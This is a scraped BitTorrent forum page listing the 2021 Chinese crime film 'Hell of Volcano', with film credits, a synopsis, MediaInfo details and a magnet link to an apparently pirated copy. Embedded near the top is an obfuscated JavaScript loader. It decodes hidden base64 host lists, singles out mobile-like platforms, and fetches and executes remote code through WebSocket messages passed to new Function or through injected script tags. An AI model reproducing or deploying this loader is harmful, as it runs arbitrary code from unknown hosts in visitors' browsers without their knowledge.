火山地狱[国语中字].Hell.of.Volcano.2021.WEB-DL.4K.H265.DDP.5.1-迅雷下载 13.17GB

版主小s 1月前 302

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x46\x6a\x59\x48\x73\x4f\x52\x52\x45\x59']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vamxza2pmLm5pYYW5nYYW94aWFuc2hlbmcuYY29t','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['Y','O']);}:function(){};

火山地狱[国语中字].Hell.of.Volcano.2021.WEB-DL.4K.H265.DDP.5.1-迅雷下载 13.17GB

◎译  名 火山地狱 / Hell of Volcano
◎年  代 2021
◎产  地 中国大陆
◎类  别 悬疑 / 犯罪
◎语  言 汉语普通话
◎上映日期 2021-06-11(中国大陆)
◎IMDb链接 https://www.imdb.com/title//
◎豆瓣链接 https://movie.douban.com/subject/35087496/
◎片  长 90分钟
◎导  演 吴天戈 Tiange Wu (id:1318057)
◎编  剧 金茂  (id:1459383)
◎演  员 陈龙 Long Chen (id:1314478)
       王紫逸 Ziyi Wang (id:1317348)
       海铃 Ling Hai (id:1353579)
       张璐瑶 Luyao Zhang (id:1380109)
       刘思博 Sibo Liu (id:1345663)
       鲁思远 Siyuan Lu (id:1418006)
       金茂  (id:1459383)
       管健  (id:1459384)
       麦建柏  (id:1459385)

◎标  签 2021 / 犯罪 / 悬疑 / 中国大陆 / 剧情 / 记者 / 新闻 / 惊悚

◎简  介
  一名女记者遇到了一名持枪抢劫者,她并没有简单的选择报警,而是与之接触,当女记者与抢劫者达到心灵沟通时,这名持枪抢劫者做出了影响他一生的决定……

  1. ##### MediaInfo ######
  2. General
  3. Unique ID                                : 306827810503795983484232844873325039242 (0xE6D4E30574C242B4BE5F48DB5EBF4E8A)
  4. Complete name                            : [email protected]
  5. Format                                   : Matroska
  6. Format version                           : Version 4
  7. File size                                : 13.2 GiB
  8. Duration                                 : 1 h 32 min
  9. Overall bit rate                         : 20.5 Mb/s
  10. Encoded date                             : UTC 2021-07-29 10:59:12
  11. Writing application                      : mkvmerge v58.0.0 ('Supper's Ready') 64-bit
  12. Writing library                          : libebml v1.4.2 + libmatroska v1.6.4
  13. Video
  14. ID                                       : 1
  15. Format                                   : HEVC
  16. Format/Info                              : High Efficiency Video Coding
  17. Format profile                           : [email protected]@Main
  18. Codec ID                                 : V_MPEGH/ISO/HEVC
  19. Duration                                 : 1 h 32 min
  20. Bit rate                                 : 20.0 Mb/s
  21. Width                                    : 3 840 pixels
  22. Height                                   : 1 608 pixels
  23. Display aspect ratio                     : 2.40:1
  24. Frame rate mode                          : Constant
  25. Frame rate                               : 24.000 FPS
  26. Color space                              : YUV
  27. Chroma subsampling                       : 4:2:0
  28. Bit depth                                : 8 bits
  29. Bits/(Pixel*Frame)                       : 0.135
  30. Stream size                              : 12.9 GiB (98%)
  31. Default                                  : Yes
  32. Forced                                   : No
  33. Audio #1
  34. ID                                       : 2
  35. Format                                   : E-AC-3
  36. Format/Info                              : Enhanced AC-3
  37. Commercial name                          : Dolby Digital Plus
  38. Codec ID                                 : A_EAC3
  39. Duration                                 : 1 h 32 min
  40. Bit rate mode                            : Constant
  41. Bit rate                                 : 256 kb/s
  42. Channel(s)                               : 6 channels
  43. Channel layout                           : L R C LFE Ls Rs
  44. Sampling rate                            : 48.0 kHz
  45. Frame rate                               : 31.250 FPS (1536 SPF)
  46. Compression mode                         : Lossy
  47. Stream size                              : 168 MiB (1%)
  48. Language                                 : Chinese
  49. Service kind                             : Complete Main
  50. Default                                  : Yes
  51. Forced                                   : No
  52. Audio #2
  53. ID                                       : 3
  54. Format                                   : AAC LC
  55. Format/Info                              : Advanced Audio Codec Low Complexity
  56. Codec ID                                 : A_AAC-2
  57. Duration                                 : 1 h 32 min
  58. Bit rate                                 : 192 kb/s
  59. Channel(s)                               : 2 channels
  60. Channel layout                           : L R
  61. Sampling rate                            : 44.1 kHz
  62. Frame rate                               : 43.066 FPS (1024 SPF)
  63. Compression mode                         : Lossy
  64. Stream size                              : 125 MiB (1%)
  65. Language                                 : Chinese
  66. Default                                  : No
  67. Forced                                   : No


TAGS 悬疑 犯罪

磁力链:
  • magnet:?xt=urn:btih:3B1FC6434D167BC1B98659DC7197CBC33701EC54
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回